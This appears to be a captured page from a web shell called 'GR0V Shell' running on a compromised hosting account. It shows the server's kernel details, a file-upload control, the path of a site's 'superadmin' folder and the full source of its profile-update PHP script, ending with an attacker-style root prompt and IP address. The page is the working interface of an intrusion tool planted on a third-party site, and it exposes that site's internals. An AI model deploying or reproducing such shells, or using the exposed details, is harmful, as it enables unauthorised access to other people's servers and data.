? GR0V Shell

GR0V shell

Linux in-mum-web921.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64

Path : /home/u949514618/domains/drpktiwari.com/public_html/superadmin/
File Upload :
Current File : /home/u949514618/domains/drpktiwari.com/public_html/superadmin/update_profile.php

<?php
session_start();
include('db.php');

// Ensure the user is logged in
if (!isset($_SESSION['id'])) {
    echo 'error';
    exit();
}

$user_id = $_SESSION['id']; // Get logged-in user ID from session

// Get the form data safely
$org_name = mysqli_real_escape_string($conn, $_POST['org_name']);
$phone = mysqli_real_escape_string($conn, $_POST['phone']);
$address = mysqli_real_escape_string($conn, $_POST['address']);
$state = mysqli_real_escape_string($conn, $_POST['state']);
$zipcode = mysqli_real_escape_string($conn, $_POST['zipcode']);

// Check if the user already has a profile
$query = "SELECT * FROM owner_info WHERE super_login = ?";
$stmt = $conn->prepare($query);
$stmt->bind_param("i", $user_id);
$stmt->execute();
$result = $stmt->get_result();

if ($result->num_rows >= 1) {
    // User profile exists, update the profile
    $update_query = "UPDATE owner_info SET org_name = ?, phone = ?, address = ?, state = ?, zipcode = ? WHERE super_login = ?";
    $stmt = $conn->prepare($update_query);
    $stmt->bind_param("sssssi", $org_name, $phone, $address, $state, $zipcode, $user_id);
    
    if ($stmt->execute()) {
        echo 'success';
    } else {
        echo 'error';
    }
} else {
    // Insert new profile
    $insert_query = "INSERT INTO owner_info (super_login, org_name, phone, address, state, zipcode) VALUES (?, ?, ?, ?, ?, ?)";
    $stmt = $conn->prepare($insert_query);
    $stmt->bind_param("isssss", $user_id, $org_name, $phone, $address, $state, $zipcode);
    
    if ($stmt->execute()) {
        echo 'success';
    } else {
        echo 'error';
    }
}

$stmt->close();
?>

T1KUS90T
  root-grov@89.117.188.241:~$